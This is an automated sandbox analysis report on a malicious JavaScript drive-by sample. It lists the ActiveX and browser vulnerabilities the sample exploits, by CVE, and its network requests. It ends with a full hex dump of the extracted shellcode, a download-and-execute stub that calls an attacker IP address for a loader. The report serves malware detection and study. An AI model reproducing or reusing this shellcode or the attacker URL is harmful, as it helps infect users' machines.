Analysis report for 2e678cb760caed3be7bf34f3b2f00058.js

Sample Overview

File2e678cb760caed3be7bf34f3b2f00058.js
MD52e678cb760caed3be7bf34f3b2f00058
Analysis Started2008-11-20 15:37:40
Report Generated2009-01-05 13:16:18
Jsand version1.03.02

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
SuperBuddy LinkSBIconsThe LinkSBIcons method in the AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) dereferences an arbitrary function pointerCVE-2006-5820
DirectAnimation PathControlHeap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1 via unknown manipulations in arguments to the KeyFrame methodCVE-2006-4777
Office Snapshot ViewerThe Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machineCVE-2008-2463
WksPictureInterfaceAn ActiveX control in WkImgSrv.dll allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property valueCVE-2008-1898
OurGame various errorsErrors in the GLIEDown2.dll ActiveX control via methods and properties IEStart, IEStartNative, ServerList, GameInfo, GroupNameSA30469
GomPlayer OpenURLBuffer overflow in the GomManager via a long argument to the OpenUrl methodCVE-2007-5779
QuickTime RTSPStack-based buffer overflow in Apple QuickTime via an RTSP response with a long Content-Type headerCVE-2007-0015
NCTAudioFile2 SetFormatLikeSampleStack-based buffer overflow in the NCTAudioFile2.AudioFile ActiveX control via a long argument to the SetFormatLikeSample functionCVE-2007-0018
Creative CacheFolderStack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control via a long CacheFolder property valueCVE-2008-0955
MDACArbitrary file download via the Microsoft Data Access Components (MDAC)CVE-2006-0003
WebViewFolderWebViewFolder integer overflow via the setSlice methodCVE-2006-3730

Deobfuscation results

Evals

Writes

No writes.

Network

Requests

URLStatus
http://www.cs.ucsb.edu/~marco/jsan/unknown200
http://59.125.229.71/ex/7/pdf.php?id=106500

Redirects

No redirects.

ActiveX controls

Shellcode and Malware

HexadecimalASCII
43 43 43 43 43 43 eb 0f  5b 33 c9 66 b9 80 01 80 
33 ef 43 e2 fa eb 05 e8  ec ff ff ff 7f 8b 4e df 
ef ef ef 64 af e3 64 9f  f3 42 64 9f e7 6e 03 ef 
eb ef ef 64 03 b9 87 61  a1 e1 03 07 11 ef ef ef 
66 aa eb b9 87 77 11 65  e1 07 1f ef ef ef 66 aa 
e7 b9 87 ca 5f 10 2d 07  0d ef ef ef 66 aa e3 b9 
87 00 21 0f 8f 07 3b ef  ef ef 66 aa ff b9 87 2e 
96 0a 57 07 29 ef ef ef  66 aa fb af 6f d7 2c 9a 
15 66 aa f7 06 e8 ee ef  ef b1 66 9a cb 64 aa eb 
85 ee b6 64 ba f7 b9 07  64 ef ef ef bf 87 d9 f5 
c0 9f 07 78 ef ef ef 66  aa f3 64 2a 6c 2f bf 66 
aa cf 87 10 ef ef ef bf  64 aa fb 85 ed b6 64 ba 
f7 07 8e ef ef ef ec aa  cf 28 ef b3 91 c1 8a 28 
af eb 97 8a ef ef 10 9a  cf 64 aa e3 85 ee b6 64 
ba f7 07 af ef ef ef 85  e8 b7 ec aa cb dc 34 bc 
bc 10 9a cf bf bc 64 aa  f3 85 ea b6 64 ba f7 07 
cc ef ef ef 85 ef 10 9a  cf 64 aa e7 85 ed b6 64 
ba f7 07 ff ef ef ef 85  10 64 aa ff 85 ee b6 64 
ba f7 07 ef ef ef ef ae  b4 bd ec 0e ec 0e ec 0e 
ec 0e 6c 03 eb b5 bc 64  35 0d 18 bd 10 0f ba 64 
03 64 92 e7 64 b2 e3 b9  64 9c d3 64 9b f1 97 ec 
1c b9 64 99 cf ec 1c dc  26 a6 ae 42 ec 2c b9 dc 
19 e0 51 ff d5 1d 9b e7  2e 21 e2 ec 1d af 04 1e 
d4 11 b1 9a 0a b5 64 04  64 b5 cb ec 32 89 64 e3 
a4 64 b5 f3 ec 32 64 eb  64 ec 2a b1 b2 2d e7 ef 
07 1b 11 10 10 ba bd a3  a2 a0 a1 ef 68 74 74 70 
3a 2f 2f 35 39 2e 31 32  35 2e 32 32 39 2e 37 31 
2f 65 78 2f 37 2f 6c 6f  61 64 2e 70 68 70 3f 69 
64 3d 31 30 36 26 73 70  6c 3d 35 00 
CCCCCC..[3.f....
3.C...........N.
...d..d..Bd..n..
...d...a........
f....w.e......f.
...._.-.....f...
..!...;...f.....
..W.)...f...o.,.
.f........f..d..
...d....d.......
...x...f..d*l/.f
........d.....d.
.........(.....(
.........d.....d
..............4.
......d.....d...
.........d.....d
.........d.....d
................
..l....d5......d
.d..d...d..d....
..d.....&..B.,..
..Q......!......
......d.d...2.d.
.d...2d.d.*..-..
............http
://59.125.229.71
/ex/7/load.php?i
d=106&spl=5.

No additional malware was retrieved.